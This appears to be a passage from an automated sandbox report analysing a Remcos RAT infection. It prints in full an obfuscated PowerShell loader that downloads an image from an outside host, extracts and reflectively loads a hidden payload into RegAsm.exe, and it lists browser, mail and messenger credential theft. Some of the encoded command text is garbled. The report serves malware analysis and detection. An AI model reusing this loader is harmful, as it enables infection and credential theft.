? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vggr/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?eJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vggr/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                  Source: RegAsm.exe, 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434CB6 cpuid 14_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,14_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,14_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004489D7 GetSystemTimeAsFileTime,14_2_004489D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B69E GetComputerNameExW,GetUserNameW,14_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data14_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db14_2_0040BB6B
                  Searches for Windows Mail specific files
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
